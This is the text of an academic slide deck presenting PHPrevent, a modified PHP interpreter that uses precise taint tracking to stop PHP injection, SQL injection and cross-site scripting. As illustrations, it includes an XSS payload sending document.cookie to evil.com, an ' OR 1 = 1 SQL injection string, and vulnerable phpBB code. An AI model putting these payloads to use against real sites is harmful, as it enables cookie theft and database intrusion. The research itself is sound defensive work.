Automatically Hardening Web Applications Using Precise Tainting

advertisement
Automatically Hardening Web
Applications Using Precise
Tainting
Anh Nguyen-Tuong
Salvatore Guarnieri
Doug Greene
Jeff Shirley
David Evans
University of Virginia
phpBB Worm
•
•
•
•
•
December 21, 2004
Over 40,000 sites defaced
PHP injection
Loads Perl scripts to spread itself
Uses Google to search for other phpBB
sites
2
phpBB Vulnerability
$words = explode (' ',
trim (htmlspecialchars
(urldecode
($HTTP_GET_VARS
['highlight']))));
...
$highlight_match[] = ...
$words[$i] ...;
...
… preg_replace (...
$highlight_match ...)
Original user input:
'_%2527_attack
User input after
HTTP_GET_VARS call:
\'_%27_attack
User input after explicit
urldecode call:
\'_'_attack
3
Classes of Attacks
• Code injection
– Cause user provided data to be executed
while data is being processed
• PHP injection (phpBB worm)
• SQL injection
• Output generation
– Cause user provided data to be displayed to
visitors of the website: Cross Site Scripting
4
SQL Injection
• Attacker constructs data that injects database
commands
• Example:
$res = executeQuery ("SELECT real_name
FROM users WHERE user = '" . $user
. "'AND pwd = '"
. $pwd . "' ");
5
Cross Site Scripting
• Inserts user provided data onto a webpage
that may include JavaScript
• Executes with permissions of hosting
website
• Simple example:
<b onmouseover= 'location.href=
"http://evil.com/steal.php?" +
document.cookie'>Hello</b>
6
7
Importance
• Over 12% of Secunia Advisories
• 4 of last 10 advisories from FrSIRT
• Cross Site Scripting and Code Injection
are responsible for many attacks on the
internet
• It is very hard to write bug free code
8
Previous Approaches
• Static techniques
• Dynamic techniques before deployment
• Dynamic techniques during deployment
9
Static
•
•
•
•
Static analyzers [Shanker+ 01]
Code inspections [Fagan76]
SQL prepared statements [Fisk04, Php05]
Pros
– No runtime overhead
– Can be done before website is released to the public
• Cons
– Coding practices may need to change
– Inspections are only as good as the inspector
– Many false positives
10
Dynamic Before Deployment
• Automated Test Suites: [Huang+ 04], [Tenable05],
[Kavado05], [Offutt+ 04], [Watchfire05], [SPI05]
• Human testing
• Pros
– Coding practices do not need to change
– Attempts to simulate real world attacking conditions
• Cons
– Only tests known attacks, cannot show absence of
vulnerability
– Requires developer effort to fix security holes
11
Automated Dynamic: Firewalls
• Incoming [Scott, Sharp 02]
• Incoming and Outgoing [Watchfire04],
[Kavado05], [Teros04]
• Pros
– No need to modify web service
• Cons
– Only prevent recognized attacks
– Coarse policies without knowing application
semantics
12
Automated: Magic Quotes
• Escape all quotes supplied by a user
• Implemented in PHP and other scripting
languages
• Extremely successful
– Do not require the programmer to do anything
– Prevent many SQL injection attacks
– But, prevent only a specific class of attacks
13
Previous Work Limitations
• Being precise about what constitutes an
attack is a lot of work
• Automated techniques suffer from not
exploiting the application semantics
• We want a system that works as
effortlessly as magic quotes, but prevents
a wider class of attacks
14
Our Approach
• Fully automated
• Aware of application semantics
• Replace PHP interpreter with a modified
interpreter that:
– Keeps track of which information comes from
untrusted sources (precise tainting)
– Checks how untrusted input is used
15
file.php
2
3
File System
Client
1
4
PHP Interpreter
PHPrevent
8
5
HTTP Server
Database
6
7
Web Server
System APIs
16
Coarse Grain Tainting
• Provided by many scripting languages (Perl,
Ruby)
• Untrusted input is tainted
• Everything touched by tainted data becomes
tainted
$query = "SELECT real_name FROM users WHERE
user = '" . $user
. "'AND pwd = '"
. $pwd . "' ";
Entire $query string is tainted
17
Precise Tainting
• Untrusted input is tainted
• Taint markings are maintained at character level
– Depends on semantics of program
• Only really tainted data is tainted
$query = "SELECT real_name FROM users WHERE
user = '" . $user . "'AND pwd = '" . $pwd . "' ";

$query = "SELECT real_name FROM users WHERE
user = '' OR 1 = 1; -- ';'AND pwd = '' ";
18
Precise Checking
• Wrappers around PHP functions that
handle updating and checking precise taint
information
• Conservative: no false negatives while
minimizing false positives
– Behavior only changes when an attack is
likely
19
Preventing SQL Injection
• Parse the query using the Postgres SQL
parser: identify interpreted text
• Disallow SQL keywords or delimiters in
interpreted text that is tainted
– Query is not sent to database
– Error response it returned
"SELECT real_name FROM users WHERE
user = '' OR 1 = 1; -- ';' AND pwd = '' ";
20
Preventing PHP Injection
• Disallow tainted data to be used in
functions that treat input strings as PHP
code or manipulate system state
– We place wrappers around these functions to
enforce this rule
• phpBB attack prevented by wrappers
around preg_replace
21
Preventing Cross Site Scripting
• Wrappers around output functions
– Buffer output and then parse the tainted output with HTML Tidy
• Check the parsed HTML against a white list to ensure
there is no dangerous output
– Dangerous content was determined by examining HTML
grammar
– Sanitize it by removing tags
<b>Hello</b>  Safe
<b onmouseover= 'location.href=
"http://evil.com/steal.php?" +
document.cookie'>Hello</b>  Unsafe
22
Current Status
• Modified PHP interpreter: PHPrevent
– Prevents PHP injection, SQL injection and
cross site scripting attacks
– Overly conservative: we have not specified
precise semantics for most PHP functions
• Performance
– Initial measurements indicate performance
overhead is acceptable
23
Future Work: Theory and Analysis
• End-to-end information flow security
• Replace ad-hoc taint marking with
principled mechanism
– Analyze data flow at interpreter level
– Infer taint specifications for PHP functions
using dynamic analysis
• Verify that taint marking in PHP
specification is consistent with interpreter
implementation
24
Future Work: Implementation
• Full implementation of precise tainting for
PHP APIs
• Handle persistent state
– Track tainting through database store
• Multiple tainting types with different
checking rules
• Incorporate modifications into main PHP
distribution
25
Summary
• Many websites are prone to attacks even
after using current methods
• Our method:
– Fully automated
– Prevents large classes of attacks
– Easy to deploy
26
Thank You
www.cs.virginia.edu/sammyg
27
Download